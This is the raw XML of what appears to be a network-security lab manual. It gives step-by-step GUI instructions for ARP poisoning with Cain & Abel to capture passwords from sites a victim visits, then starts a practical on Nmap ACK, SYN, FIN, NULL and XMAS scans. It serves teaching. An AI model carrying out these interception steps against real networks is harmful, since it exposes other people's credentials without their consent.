      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="220"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="449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2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6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5" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Select sniffer on the top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520217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2265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="451" name="image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6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5B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Next to folder icon click on icon name start/stop sniffer. Select device and click on ok.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520227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6032</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2916407" cy="3647884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="453" name="image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407" cy="3647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  <w:spacing w:before="220"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>4 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on “+” icon on the top. Click on ok.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520238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605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1925195" cy="3202305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="455" name="image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19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2C75" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A4412E" w:rsidRDefault="00A4412E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A4412E" w:rsidRDefault="00A4412E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A4412E" w:rsidRDefault="00A4412E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRPr="00D4195F" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Shows the Connected host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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202483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17350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="457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2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09E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>6 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Select Arp at bottom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520258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2574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="459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2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6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  <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP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 w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>7 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on “+” icon at the top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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202688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17350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="461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3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09E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>8 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on start/stop ARP icon on top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202790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574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="463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3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20409E" w:rsidRDefault="0020409E" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020409E" w:rsidRDefault="0020409E" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>9 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Poisoning the source.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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202892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17350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="465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23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  <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>10 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to any website on source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202995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574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5923788" cy="3189732"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="467" name="image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23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788" cy="3189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</w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="289" w:lineRule="exact"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:line="289" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId44"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="280" w:left="1220" w:header="0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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>11 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to password option in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>cain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>abel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> and see the visited site password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4412E" w:rsidRPr="00D4195F" w:rsidRDefault="00A4412E" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25203097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6485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="469" name="image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23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Pr="00D4195F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CD2C75" w:rsidRDefault="00CD2C75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D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F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5B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="005B6F48">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:jc w:val="center"/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PRACTICAL NO. 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00711EFA" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00711EFA" w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Scanning with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00711EFA" w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00711EFA" w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711EFA" w:rsidRPr="00711EFA" w:rsidRDefault="00711EFA" w:rsidP="00711EFA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711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform an ACK scan to determine if a port is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> filtered, unfiltered, or open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711EFA" w:rsidRPr="00711EFA" w:rsidRDefault="00711EFA" w:rsidP="00711EFA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711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Perform SYN, FIN, NULL, and XMAS scans to identify open p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>orts and their characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00711EFA" w:rsidRDefault="00711EFA" w:rsidP="00711EFA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711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analyze the scan results to gather information about the target system's network services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711EFA" w:rsidRDefault="00711EFA" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for windows and install it. After that open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711EFA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” to check if it is installed properly. Now type the below commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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 xml:space="preserve">ACK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F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D4195F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Pr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (TCP ACK scan)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">It never determines open (or even </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>open|filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">) ports. It is used to map out firewall rulesets, determining whether they are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>stateful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> or not and which ports are filtered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
